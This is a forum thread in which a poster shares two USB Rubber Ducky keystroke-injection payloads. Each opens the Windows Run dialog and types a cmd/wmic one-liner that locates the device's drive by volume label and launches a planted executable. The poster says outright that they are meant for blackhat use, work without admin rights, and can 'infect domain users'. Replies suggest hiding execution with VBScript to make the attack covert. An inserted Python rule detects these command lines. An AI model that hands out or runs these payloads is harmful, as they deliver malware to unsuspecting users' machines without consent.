AgentGod Posted January 25, 2014 (edited)

For long I have been searching around for a payload as such, but the only thing I found was the following:

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd

Which essentially is not even 10% efficient. You need Administrative rights to use the Payload above (Diskpart) and what's with the Vbs. If you really do want to execute and run, you do not need to put the file in temp. You can put your file in a Winrar SFX which will put your malware into which folder you wish and run it there. Tutorial on that will come later, as I have too much to do.

The below payload takes 3-4 seconds before executing. You have to remount (Plug in the Rubber ducky, let it install drivers, then replug it and have your file be executed).

DELAY 3000
GUI r
DELAY 100
STRING cmd /c for /f %a in ('wmic logicaldisk get volumename^, name ^| find "DUCKY"') do start "" /D %a\ %a\DUCKY.exe
DELAY 10
ENTER

That one is one of the codes, simple AF. It goes into Run line, uses the wmic logicaldisk command to search for the drive name of anything you want (Ducky) and executes it in a matter of seconds. I believe the Terminal is up for a matter of seconds, not even that.

You can use the Twin Ducky to have your file stored on your ducky. I believe you can loop the command above so you do not need to replug, but it will just take long and is not worth it.

This is another code, does the same, but is shorter:

DELAY 3000
GUI r
DELAY 100
cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe
DELAY 10
ENTER

The code above is almost instant (Depends on your malware size).

And yes, this payload is meant for Blackhat activity. If you do edit it, do give proper credits.

New scripts will come, making it easier for all of us to execute our files, going back to normal fast Autorun, not a 3 page long script that takes 15 minutes to execute.

I forgot to mention, this does not require administrative rights, so no need to bypass the freaking UAC problems. And go on infect domain users.

Winrar SFX:

Edited January 25, 2014 by AgentGod
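A detection-side view of the two payloads in the post above, added here as an example and not part of the original thread: both leave a `cmd /c for /f` command line that asks `wmic` for a volume label and then starts a file from the drive letter it found. The field names (Sysmon Event ID 1 style), the sample records and the severity labels are assumptions made for this example.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style field names).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'''cmd /c for /f %a in ('wmic logicaldisk get volumename^, name ^| find "DUCKY"') do start "" /D %a\ %a\DUCKY.exe'''},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'''cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe'''},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c wmic logicaldisk get volumename, name"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd /c for /f %a in ('dir /b *.log') do echo %a"},
]

CARET = re.compile(r"\^(.)")  # cmd.exe escape character: ^x means literal x
LOOP = re.compile(
    r"for\s+/f\s+.*?%+(?P<var>\w)\s+in\s+\('(?P<inner>[^']*)'\)\s+do\s+(?P<body>.+)",
    re.I)
VOLUME_QUERY = re.compile(
    r"\bwmic\s+(logicaldisk|volume)\b.*\b(volumename|label)\b.*\|\s*find(str)?\b",
    re.I)

def classify(event):
    """Return 'high', 'medium' or None for one process-creation record."""
    cmdline = CARET.sub(r"\1", event["CommandLine"])  # undo ^, and ^| escaping
    loop = LOOP.search(cmdline)
    if not loop or not VOLUME_QUERY.search(loop["inner"]):
        return None  # no for /f loop, or it does not look up a drive by label
    # The loop body must launch something from the drive letter the loop found.
    launch = re.compile(r"\bstart\b.*%+" + re.escape(loop["var"]) + r"\\", re.I)
    if not launch.search(loop["body"]):
        return None
    # Win+R launches are children of explorer.exe; the payloads on this page
    # type into that dialog (GUI r), so that parent raises the severity.
    from_run_dialog = event["ParentImage"].lower().endswith("\\explorer.exe")
    return "high" if from_run_dialog else "medium"

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev), "|", ev["CommandLine"])
```

The plain `wmic` inventory query and the `for /f` loop over `dir` are not flagged, because the rule needs the label lookup and the launch from the loop variable together.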
overwraith Posted January 25, 2014

I am relatively new to the whole hacking scene, and I did not know until recently that diskpart was an admin tool. The whole idea behind runexe from SD was to make a batch file that waited for the ducky SD card to be mounted. The ducky SD card mounting did not use to be as efficient as it is today. Yes, there is room for improvement, or even replacement of my code. I am really only into this hacking thing on free time, and I do not have the pen testing knowledge that somebody trained in the field would have. The VBS thing is actually a technique for running a batch file on Windows silently. Recent Windows versions took that ability away, so a workaround was required, hence the VBS. As I was saying before, there used to be a substantial delay between when the keyboard would run, and when the SD was mounted. You could use the button, but I wanted something that would automatically run, so a batch file was needed.
MB60893 Posted January 25, 2014 (edited)

You could always use a VBScript to detect when the drive is there, then write the ducky drive letter to a .bat file. Then execute that. Best thing is the VBScript won't be shown in any kind of console/terminal, so you are really going to make the script covert!

EDIT: I see that a newer VBScript has been added with the same properties. Just use that and modify if you have any further troubles.

Edited January 25, 2014 by MB60893